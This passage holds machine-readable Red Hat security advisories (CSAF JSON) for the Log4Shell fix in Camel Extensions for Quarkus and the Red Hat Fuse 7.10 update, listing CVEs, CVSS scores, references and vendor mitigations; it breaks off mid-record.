{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "A security update to Red Hat Integration Camel Extensions for Quarkus 2.2 is now available. The purpose of this text-only errata is to inform you about the security issues fixed.\n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "This update of Red Hat Integration - Camel Extensions for Quarkus serves as a replacement for 2.2 GA and includes the following security Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5126", "url": "https://access.redhat.com/errata/RHSA-2021:5126" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=red.hat.integration\u0026version=2021-Q4", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=red.hat.integration\u0026version=2021-Q4" }, { "category": "external", "summary": "https://access.redhat.com/documentation/en-us/red_hat_integration/2021.q4", "url": "https://access.redhat.com/documentation/en-us/red_hat_integration/2021.q4" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5126.json" } ], "title": "Red Hat Security Advisory: Red Hat Integration Camel Extensions for Quarkus GA security update", "tracking": { "current_release_date": "2024-12-12T01:17:31+00:00", "generator": { "date": "2024-12-12T01:17:31+00:00", "engine": { "name": "Red Hat SDEngine", 
"version": "4.2.3" } }, "id": "RHSA-2021:5126", "initial_release_date": "2021-12-14T16:19:04+00:00", "revision_history": [ { "date": "2021-12-14T16:19:04+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-14T16:19:05+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:17:31+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Integration Camel Quarkus", "product": { "name": "Red Hat Integration Camel Quarkus", "product_id": "Red Hat Integration Camel Quarkus", "product_identification_helper": { "cpe": "cpe:/a:redhat:camel_quarkus:2.2" } } } ], "category": "product_family", "name": "Red Hat Integration" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. 
In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat 
Integration Camel Quarkus" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T16:19:04+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "Red Hat Integration Camel Quarkus" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5126" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment 
variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "Red Hat Integration Camel Quarkus" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Integration Camel Quarkus" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" } ] }
rhsa-2021_5134
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "A minor version update (from 7.9 to 7.10) is now available for Red Hat Fuse. The purpose of this text-only errata is to inform you about the security issues fixed in this release.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "This release of Red Hat Fuse 7.10.0 serves as a replacement for Red Hat Fuse 7.9, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core (CVE-2020-9488, CVE-2021-44228)\n\n* nodejs-lodash (CVE-2019-10744)\n\n* libthrift (CVE-2020-13949)\n\n* xstream (CVE-2020-26217, CVE-2020-26259, CVE-2021-21341, CVE-2021-21342, CVE-2021-21343, CVE-2021-21344, CVE-2021-21345, CVE-2021-21346, CVE-2021-21347, CVE-2021-21348, CVE-2021-21349, CVE-2021-21350, CVE-2021-21351)\n\n* undertow (CVE-2020-27782, CVE-2021-3597, CVE-2021-3629, CVE-2021-3690)\n\n* xmlbeans (CVE-2021-23926)\n\n* batik (CVE-2020-11987)\n\n* xmlgraphics-commons (CVE-2020-11988)\n\n* tomcat (CVE-2020-13943)\n\n* bouncycastle (CVE-2020-15522, CVE-2020-15522)\n\n* groovy (CVE-2020-17521)\n\n* tomcat (CVE-2020-17527)\n\n* jetty (CVE-2020-27218, CVE-2020-27223, CVE-2021-28163, CVE-2021-28164, CVE-2021-28169, CVE-2021-34428)\n\n* jackson-dataformat-cbor (CVE-2020-28491)\n\n* jboss-remoting (CVE-2020-35510)\n\n* 
kubernetes-client (CVE-2021-20218)\n\n* netty (CVE-2021-21290, CVE-2021-21295, CVE-2021-21409)\n\n* spring-web (CVE-2021-22118)\n\n* cxf-core (CVE-2021-22696)\n\n* json-smart (CVE-2021-27568)\n\n* jakarta.el (CVE-2021-28170)\n\n* commons-io (CVE-2021-29425)\n\n* sshd-core (CVE-2021-30129)\n\n* cxf-rt-rs-json-basic (CVE-2021-30468)\n\n* netty-codec (CVE-2021-37136, CVE-2021-37137)\n\n* jsoup (CVE-2021-37714)\n\n* poi (CVE-2019-12415)\n\n* mysql-connector-java (CVE-2020-2875, CVE-2020-2934)\n\n* wildfly (CVE-2021-3536)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5134", "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.fuse\u0026version=7.10.0", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.fuse\u0026version=7.10.0" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "1739497", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1739497" }, { "category": "external", "summary": "1802531", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1802531" }, { "category": "external", "summary": "1831139", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1831139" }, { "category": "external", "summary": "1851014", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1851014" }, { "category": "external", "summary": "1851019", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1851019" }, { 
"category": "external", "summary": "1887648", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887648" }, { "category": "external", "summary": "1898907", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898907" }, { "category": "external", "summary": "1901304", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901304" }, { "category": "external", "summary": "1902826", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1902826" }, { "category": "external", "summary": "1904221", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1904221" }, { "category": "external", "summary": "1905796", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905796" }, { "category": "external", "summary": "1908837", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1908837" }, { "category": "external", "summary": "1922102", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922102" }, { "category": "external", "summary": "1922123", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922123" }, { "category": "external", "summary": "1923405", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1923405" }, { "category": "external", "summary": "1927028", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1927028" }, { "category": "external", "summary": "1928172", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928172" }, { "category": "external", "summary": "1930423", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1930423" }, { "category": "external", "summary": "1933808", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1933808" }, { "category": "external", "summary": "1933816", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1933816" }, { "category": "external", "summary": "1934116", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1934116" }, { "category": "external", "summary": "1937364", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1937364" }, { "category": "external", "summary": "1939839", "url": 
"https://bugzilla.redhat.com/show_bug.cgi?id=1939839" }, { "category": "external", "summary": "1942539", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942539" }, { "category": "external", "summary": "1942545", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942545" }, { "category": "external", "summary": "1942550", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942550" }, { "category": "external", "summary": "1942554", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942554" }, { "category": "external", "summary": "1942558", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942558" }, { "category": "external", "summary": "1942578", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942578" }, { "category": "external", "summary": "1942629", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942629" }, { "category": "external", "summary": "1942633", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942633" }, { "category": "external", "summary": "1942635", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942635" }, { "category": "external", "summary": "1942637", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942637" }, { "category": "external", "summary": "1942642", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942642" }, { "category": "external", "summary": "1944888", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888" }, { "category": "external", "summary": "1945710", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945710" }, { "category": "external", "summary": "1945712", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945712" }, { "category": "external", "summary": "1946341", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946341" }, { "category": "external", "summary": "1948001", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948001" }, { "category": "external", "summary": "1948752", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948752" }, { "category": "external", "summary": 
"1962879", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1962879" }, { "category": "external", "summary": "1965497", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1965497" }, { "category": "external", "summary": "1970930", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1970930" }, { "category": "external", "summary": "1971016", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1971016" }, { "category": "external", "summary": "1973392", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1973392" }, { "category": "external", "summary": "1974854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1974854" }, { "category": "external", "summary": "1974891", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1974891" }, { "category": "external", "summary": "1977362", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1977362" }, { "category": "external", "summary": "1981527", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1981527" }, { "category": "external", "summary": "1991299", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1991299" }, { "category": "external", "summary": "1995259", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1995259" }, { "category": "external", "summary": "2004133", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133" }, { "category": "external", "summary": "2004135", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5134.json" } ], "title": "Red Hat Security Advisory: Red Hat Fuse 7.10.0 release and security update", "tracking": { "current_release_date": "2024-12-12T01:18:21+00:00", "generator": { "date": "2024-12-12T01:18:21+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5134", "initial_release_date": 
"2021-12-14T21:31:33+00:00", "revision_history": [ { "date": "2021-12-14T21:31:33+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-14T21:31:33+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:18:21+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Fuse 7.10", "product": { "name": "Red Hat Fuse 7.10", "product_id": "Red Hat Fuse 7.10", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_fuse:7" } } } ], "category": "product_family", "name": "Red Hat JBoss Fuse" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2019-10744", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2019-07-26T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1739497" } ], "notes": [ { "category": "description", "text": "A Prototype Pollution vulnerability was found in lodash. Calling certain methods with untrusted JSON could lead to modifying objects up the prototype chain, including the global Object. A crafted JSON object passed to a vulnerable method could lead to denial of service or data injection, with various consequences.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties", "title": "Vulnerability summary" }, { "category": "other", "text": "The lodash dependency is included in OpenShift Container Platform (OCP) by Kibana in the aggregated logging stack. Elastic have issued a security advisory (ESA-2019-10) for Kibana for this vulnerability, and in that advisory stated that no exploit vectors had been identified in Kibana. 
Therefore we rate this issue as moderate for OCP and may fix this issue in a future release.\n\nhttps://www.elastic.co/community/security\n\nThis issue did not affect the versions of rh-nodejs8-nodejs and rh-nodejs10-nodejs as shipped with Red Hat Software Collections.\n\nWhilst a vulnerable version of lodash has been included in ServiceMesh, the impact is lowered to Moderate due to the library not being directly accessible increasing the attack complexity and the fact that the attacker would need some existing access - meaning the vulnerability is not crossing a privilege boundary.\n\nRed Hat Quay imports lodash as a runtime dependency of restangular. The restangular function in use by Red Hat Quay do not use lodash to parse user input. This issue therefore rated moderate impact for Red Hat Quay.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-10744" }, { "category": "external", "summary": "RHBZ#1739497", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1739497" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-10744", "url": "https://www.cve.org/CVERecord?id=CVE-2019-10744" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-10744", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10744" } ], "release_date": "2019-08-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database 
settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.0" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties" }, { "cve": "CVE-2019-12415", "cwe": { "id": "CWE-611", "name": "Improper Restriction of XML External Entity Reference" }, "discovery_date": "2020-02-13T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1802531" } ], "notes": [ { "category": "description", "text": "In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.", "title": "Vulnerability description" }, { "category": "summary", "text": "poi: a specially crafted Microsoft Excel document allows attacker to read files from the local filesystem", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], 
"product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-12415" }, { "category": "external", "summary": "RHBZ#1802531", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1802531" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-12415", "url": "https://www.cve.org/CVERecord?id=CVE-2019-12415" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-12415", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12415" } ], "release_date": "2020-02-13T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "workaround", "details": "The vulnerability is in the XSSFExportToXml util; avoid usage of this tool to mitigate the vulnerability.", "product_ids": [ "Red Hat Fuse 7.10" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.0, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "poi: a specially crafted Microsoft Excel document allows attacker to read files from the local filesystem" }, { 
"cve": "CVE-2020-2875", "discovery_date": "2020-06-25T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1851019" } ], "notes": [ { "category": "description", "text": "A flaw was found in the mysql-connector-java package. A complicated attack against the mysql Connector/J allows attackers on the local network to interfere with a user\u0027s connection and insert unauthorized SQL commands in MySQL Connectors and other products.", "title": "Vulnerability description" }, { "category": "summary", "text": "mysql-connector-java: allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors which could result in unauthorized update, insert or delete", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux customers are advised to replace the mysql-connector-java package with the mariadb-java-client, available in Red Hat Software Collections. It can be installed this way:\n\n # yum-config-manager --enable rhel-server-rhscl-7-rpms\n\n # yum install rh-mariadb103-mariadb-java-client", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-2875" }, { "category": "external", "summary": "RHBZ#1851019", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1851019" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-2875", "url": "https://www.cve.org/CVERecord?id=CVE-2020-2875" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-2875", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-2875" } ], 
"release_date": "2020-04-15T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "mysql-connector-java: allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors which could result in unauthorized update, insert or delete" }, { "cve": "CVE-2020-2934", "discovery_date": "2020-06-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1851014" } ], "notes": [ { "category": "description", "text": "A flaw was found in the mysql-connector-java package. 
A complicated attack against the mysql Connector/J allows attackers on the local network to interfere with a user\u0027s connection and insert unauthorized SQL commands.", "title": "Vulnerability description" }, { "category": "summary", "text": "mysql-connector-java: allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors which could result in unauthorized update, insert or delete", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux customers are advised to replace the mysql-connector-java package with the mariadb-java-client, available in Red Hat Software Collections. It can be installed this way:\n\n # yum-config-manager --enable rhel-server-rhscl-7-rpms\n\n # yum install rh-mariadb103-mariadb-java-client", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-2934" }, { "category": "external", "summary": "RHBZ#1851014", "url": 